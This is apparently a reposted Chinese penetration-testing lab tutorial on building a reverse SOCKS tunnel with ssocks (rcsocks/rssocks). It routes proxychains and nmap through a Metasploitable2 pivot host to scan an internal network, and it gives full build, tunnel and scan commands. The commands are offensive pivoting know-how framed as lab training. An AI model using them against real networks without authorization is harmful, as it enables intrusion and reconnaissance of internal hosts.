鄭重宣告:
本筆記撰寫目的只用于安全知識提升,并與更多人共享安全知識,切勿使用筆記中的技術進行違法活動,利用筆記中的技術造成的后果與作者本人無關,倡導維護網路安全人人有責,共同維護網路文明和諧,
內網安全之:Socks 隧道
- 1 Socks 隧道原理
- 2 實驗環境
- 2.1 客戶端配置
- 2.2 服務端配置
- 2.3 利用 Socks 隧道代理掃描內網主機
1 Socks 隧道原理
- socks 是一種代理服務,可以說是一個升級版的 lcx,
- Socks有 socks 4 和 socks 5 兩種型別,socks 4 只支持TCP 協議,而 socks 5支持 TCP/UDP 協議,
- 通過在靶機上配置 Socks 服務,讓惡意主機通過 Socks 客戶端連接 Socks 服務,進而實作跳板攻擊,
- socks 協議中有互動協議,當訪問某個網站的時候,瀏覽器會把被訪問目標的 URL 和服務埠交給 socks 服務端進行決議,socks 服務端決議后代替瀏覽器去訪問目標網站,將結果回傳給瀏覽器,
- 埠轉發必須要知道訪問埠,并只能一對一;而 socks 支持一對多
# socks 客戶端 ./rcsocks 命令
Usage:
./rcsocks -p 1088 -l 1080 -b
./rcsocks -p 1088 -l 1080
在當前配置下,遠程服務端配置如下:
./rssocks -s rcsocksserv:1080
設定你的連接工具(如:proxychains)通過 socks5 代理配置如下:
vim /etc/proxychains.conf
# 注釋下面這一行,并配置
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1088
Options:
--verbose (increase verbose level)
--listen {port} where rssocks connect back
--port {port} the socks5 port you want
--background
# socks 服務端 .rssocks 命令:
Usage:
./rssocks --socks rcsocksserv:1080 -b
./rssocks --socks rcsocksserv:1080
Options:
--verbose (increase verbose level)
--socks {host:port}
--ncon {nb of reverse connection}
--background
2 實驗環境

2.1 客戶端配置
-
下載地址
# Metasploitable2 使用了以下的 ssocks 包進行測驗: https://udomain.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz # 編譯 cd ssocks-0.0.14 ./configure && make # KALI 中,sourceforge 上的 ssocks 包在最新版本的 KALI 環境下無法編譯報錯,下載了以下鏈接的 ssocks 包進行測驗 https://github.com/tostercx/ssocks # 編譯 mkdir build cd build cmake .. make -
kali 作為 Socks 客戶端,需要等待 Socks 服務端與本機建立連接隧道,配置如下:
cd ssocks/build ./rcsocks -l 1080 -p 12321 -v # 配置監聽本地 1080 埠,將通過本地 1080 埠的流量轉發到 Socks 12321 埠,
-
利用 Proxychains 工具代理 Socks
sudo apt install proxychains vim /etc/proxychains.conf # 注釋下面這一行,并配置 # socks4 127.0.0.1 9050 socks5 127.0.0.1 1080
-
通過 Socks 隧道代理掃描內網主機
proxychains nmap –Pn -sV 192.168.100.151
2.2 服務端配置
跳板機 Metasploitable2 作為 Socks 服務端,配置如下:
cd ssocks-0.0.14/src
./rssocks -s 192.168.0.2:12321
# 配置監聽 IP 地址為 192.168.0.2 主機訪問本地 12321 埠的鏈接
./rssocks -v -s 192.168.0.2:12321
2.3 利用 Socks 隧道代理掃描內網主機
┌──(kali?kali)-[~/Desktop/ssocks/build]
└─$ proxychains nmap -sV -Pn 192.168.100.151

火狐瀏覽器配置 Socks 代理


轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297514.html
標籤:其他
